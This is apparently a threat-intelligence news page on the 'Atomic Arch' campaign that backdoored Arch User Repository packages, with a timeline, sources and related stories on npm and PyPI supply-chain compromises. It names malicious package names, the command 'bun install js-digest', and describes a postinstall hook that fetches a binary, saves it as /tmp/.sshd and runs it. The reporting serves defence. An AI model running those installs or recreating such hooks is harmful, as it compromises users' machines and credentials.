Malicious Commits in Arch Linux AUR Packages Pulled npm-Based Payloads
Arch Linux users are responding to a malware incident in the Arch User Repository (AUR) after multiple user-contributed packages were modified with malicious commits that attempted to fetch npm-based payloads during installation. Reports on the aur-general mailing list and a dedicated incident thread indicate the changes inserted unexpected npm commands and behavior unrelated to the original software, with the alvr package cited as a prominent example and atomic-lockfile named among the npm packages involved.
Arch maintainers and contributors have been removing the malicious changes, tracking affected packages, and banning associated accounts while the full scope remains under investigation. The incident is reported to be limited to the AUR and does not affect Arch Linux’s official package repositories; users are being urged to avoid blindly updating AUR packages and to review PKGBUILD diffs, newly added .install files, and any unexpected npm dependencies before installing updates.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
7 events from the most recent confirmed update back to the earliest known activity.
Arch says Atomic Arch incident is under control; affected package count reaches 1,579
Arch Linux developers said they had deleted all malicious commits they were aware of and believed the AUR malware incident was under control. A cited list put the number of affected AUR packages at 1,579, indicating the scope had grown beyond earlier estimates of 900+ packages.
Second Atomic Arch wave uses bun/js-digest to deliver new ELF payload
Reporting on the Atomic Arch supply-chain campaign said attackers launched a second wave that replaced the earlier npm-based payload chain with `bun install js-digest`, delivering a different malicious ELF. The update indicated the campaign expanded beyond the initial `atomic-lockfile` infostealer/rootkit delivery method.
Report says Atomic Arch hit 900+ AUR packages with eBPF rootkit
A new report on the 'Atomic Arch' supply-chain campaign said more than 900 AUR packages were backdoored after attackers adopted orphaned packages and modified PKGBUILDs to install malicious npm packages. The report also described expanded malware capabilities, including a Rust-based credential stealer with an eBPF rootkit, systemd persistence, Tor-based communications, and possible Monero cryptomining staging.
Arch Linux announces active mitigation for malicious AUR packages
Arch Linux said it was actively tracking malicious AUR commits and taking steps to prevent additional malicious updates from being pushed. The project warned users that AUR account creation, package updates, and package adoption or creation could be disrupted during mitigation efforts and advised users to review PKGBUILD and install script changes carefully.
Arch contributors begin tracking and removing affected AUR packages
Contributors opened a dedicated report thread to track affected packages, remove malicious commits, and ban related accounts. Reporting indicated the incident was limited to the AUR and did not affect Arch Linux's official package repositories.
Researchers detail 400+ compromised AUR packages in 'Atomic Arch' campaign
Researchers reported that more than 400 Arch User Repository packages were compromised in a supply chain attack dubbed 'Atomic Arch,' with attackers abusing orphan-package adoption to insert malicious PKGBUILD changes. The altered scripts fetched rogue npm packages that deployed an infostealer targeting browser credentials, SSH keys, environment variables, and cryptocurrency wallet data, while Arch maintainers reverted commits and banned the attacker accounts.
Malicious commits reported in Arch Linux AUR packages
A malware incident affecting Arch Linux's Arch User Repository was first reported on the aur-general mailing list, where user-contributed packages were found to contain malicious commits that attempted to download npm-based payloads during installation.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
11 references tracked. Mallory keeps watching after this page renders.
Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit
thehackernews.com
Open sourceOver 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit
thehackernews.com
Open sourceAtomic Arch: 900+ AUR Packages Backdoored with eBPF RootkitCopy | The CyberSec Guru
thecybersecguru.com
Open source400+ Arch Linux AUR Packages Compromised in a Supply Chain Attack Deploying Infostealers
cybersecuritynews.com
Open sourceArch Linux Now Believes Malware Incident Under Control: More Than 1,500 Affected Packages - Phoronix
phoronix.com
Open sourceArch Linux AUR Malware Campaign Hits Multiple User-Contributed Packages
linuxiac.com
Open sourceAtomic Arch npm Campaign Adds Malicious Dependency
sonatype.com
Open sourceAUR REPORT THREAD - Aur-general - lists.archlinux.org
lists.archlinux.org
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
PromptMink npm campaign and malicious lightning releases hit developer supply chains
ReversingLabs disclosed a long-running npm supply chain campaign dubbed **PromptMink** that inserted malicious dependencies into software projects, including the open-source crypto trading agent `openpaw-graveyard`. In one highlighted case, a commit co-authored by Anthropic’s Claude Opus added `@solana-launchpad/sdk`, which pulled in the malicious `@validate-sdk/v2` payload. Researchers said the operation has run for more than seven months across over 60 malicious packages and 300 versions, using benign-looking first-stage packages to hide disposable second-stage malware. The payloads stole credentials, sensitive files, cryptocurrency-related data, and in some Linux cases installed attacker SSH keys for persistence; later Rust variants also exfiltrated full project directories and source code. ReversingLabs linked the activity to **Famous Chollima**, a North Korea-linked group associated with Contagious Interview. Separately, Socket reported that the widely used PyPI package **`lightning`** was compromised in versions `2.6.2` and `2.6.3`, while `2.6.1` remained clean. The malicious releases reportedly executed on import, unpacked a hidden `_runtime` directory, downloaded Bun from GitHub, and launched an obfuscated JavaScript payload aimed at stealing GitHub, npm, and cloud credentials, abusing GitHub APIs, poisoning repositories, and infecting developer npm package tarballs. Because `lightning` is heavily used in developer workstations, CI/CD pipelines, and cloud build environments, researchers warned that any system that installed and imported the affected versions should be treated as compromised, with exposed credentials rotated and repositories and build systems investigated for follow-on abuse.
May 1, 2026
Malicious npm postinstall backdoor inserted into multiple GitHub JavaScript projects
Several GitHub-hosted JavaScript projects were modified to include a malicious `postinstall` entry in `package.json`, turning routine dependency installation into unauthorized code execution. Commits affecting repositories including **thedevdojo/genesis**, **katanaui/katana**, and **baskarcm/tzi-chat-ui** added a script that used `curl` with certificate checks disabled to fetch a binary named `gvfsd-network` from a GitHub Releases page tied to `parikhpreyash4/systemd-network-helper-aa5c751f`, save it as `/tmp/.sshd`, mark it executable, and run it in the background. The pattern indicates a supply-chain style compromise designed to hide a backdoor inside otherwise ordinary dependency or build changes. Other repositories moved quickly to remove the payload, with commits in **elitedevsquad/sidecar-laravel** and **katanaui/katana** explicitly reverting the suspicious `postinstall` logic while preserving legitimate build scripts. The repeated use of the same download URL, filename, and execution flow across unrelated projects suggests a coordinated campaign rather than isolated developer error. Separately, CISA added **CVE-2026-48172** in the **LiteSpeed cPanel Plugin** to its Known Exploited Vulnerabilities catalog, but the dominant event across the referenced code changes was the discovery and rollback of a malicious package-install backdoor hosted through GitHub infrastructure.
May 26, 2026
Mini Shai-Hulud Compromised Hundreds of npm Packages via Stolen Maintainer Tokens
Attackers linked by multiple researchers to **TeamPCP** hijacked the npm maintainer account `atool` and used it to publish roughly **639 malicious versions across 323 packages**, heavily impacting Alibaba’s **`@antv/*`** ecosystem as well as packages such as `echarts-for-react`, `timeago.js`, and `size-sensor`. Reports said the malware executed through malicious `preinstall` hooks and an obfuscated Bun-based payload, stealing secrets from developer workstations and CI/CD systems including GitHub, npm, AWS, Kubernetes, Vault, SSH, Docker, and database credentials. The campaign also abused GitHub tokens to create attacker-controlled repositories for exfiltration, scraped GitHub Actions runner memory for plaintext secrets, and in some cases targeted trusted tooling including a briefly compromised **Nx Console** VS Code extension. Researchers said the operation was worm-like and self-propagating, using stolen npm tokens to tamper with and republish additional packages under legitimate maintainer identities, with the broader **Mini Shai-Hulud** activity now tracked across npm, PyPI, and Composer. The malware reportedly established persistence in developer environments through modified VS Code and Claude Code settings and OS-level services, while some reports warned it also attempted to forge valid **Sigstore/SLSA provenance** using stolen CI identities. In response, **npm invalidated all write-enabled granular access tokens that bypassed two-factor authentication** and introduced **Staged Publishing** in preview, but researchers warned that any machine or pipeline that installed affected versions should be treated as fully compromised and all reachable credentials rotated immediately.
Jun 10, 2026